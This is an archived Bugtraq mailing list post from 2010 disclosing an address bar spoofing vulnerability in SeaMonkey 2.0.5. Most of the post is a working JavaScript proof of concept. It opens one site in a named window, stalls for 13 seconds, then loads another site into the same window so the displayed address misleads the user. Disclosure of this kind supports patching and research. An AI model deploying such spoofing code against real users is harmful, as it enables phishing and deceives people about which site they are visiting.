lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 17 Jul 2010 12:43:57 -0000 From: info@...uritylab.ir To: bugtraq@...urityfocus.com Subject: SeaMonkey 2.0.5 Address Bar Spoofing Vulnerability Spoof Code: <script language="javascript"> function pause(pd) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < pd); } function Spoofing () { win = window.open('http://www.google.com','new') pause (13000) win = window.open('http://www.Securitylab.ir','new') } </script> <a href="javascript: Spoofing()">Click Here</a> ########################################################################## Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com) Original Advisory: http://pouya.info/blog/userfiles/pdf/SeaMonkey-ABS.pdf http://Securitylab.ir/Advisory